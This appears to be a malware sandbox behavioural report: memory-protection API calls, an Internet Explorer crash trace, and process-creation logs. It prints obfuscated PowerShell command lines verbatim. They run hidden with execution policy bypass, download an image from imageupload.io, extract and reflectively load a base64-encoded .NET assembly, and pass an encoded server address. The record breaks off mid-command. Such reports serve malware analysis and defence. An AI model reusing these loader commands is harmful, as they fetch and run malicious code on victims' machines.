length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bad000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bb4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdc44000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdad1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9b000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077186000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772d6000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077181000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076ba0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772af000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772bb000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe117000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdbe4000
process_handle: 0xffffffffffffffff
1 0 0
Application Crash Process iexplore.exe with pid 904 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda5a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 99083376
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 99089328
registers.r11: 99085136
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1926918805
registers.r13: 0
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 1020
thread_handle: 0x00000000000004e0
process_identifier: 1968
current_directory: C:\Users\test22\Desktop
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€